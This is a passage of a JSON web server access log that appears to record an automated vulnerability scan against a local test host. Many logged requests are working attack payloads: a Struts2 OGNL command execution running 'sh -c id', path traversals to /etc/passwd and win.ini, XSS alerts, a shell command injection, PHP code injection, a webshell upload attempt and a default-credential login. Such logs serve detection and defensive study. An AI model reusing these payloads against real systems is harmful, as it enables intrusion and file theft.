(Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"\x0D\x0A\x0D\x0A _CobblerXMLRPCInterface__make_token\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"--e64bdf16c554bbc109cecef6451c26a4\x0D\x0AContent-Disposition: form-data; name=\x22Filedata\x22; filename=\x2229KBxVdFR5MxsWxjucE68dn0GHG.php\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A--e64bdf16c554bbc109cecef6451c26a4--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logos_clients/1.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /routes/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /perl-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/logo/logo-eoffice.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"userid=kevinlab&userpass=kevin003","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/proc.php?type=login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"29KBxiE8kWZCxxVOxNvv2vmU57M","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /fileserver/test.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/bgservlets/test.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-requests-log.http HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fileserver/test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=smartcode HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http://127.0.0.1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prtg/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-client.cookies HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", 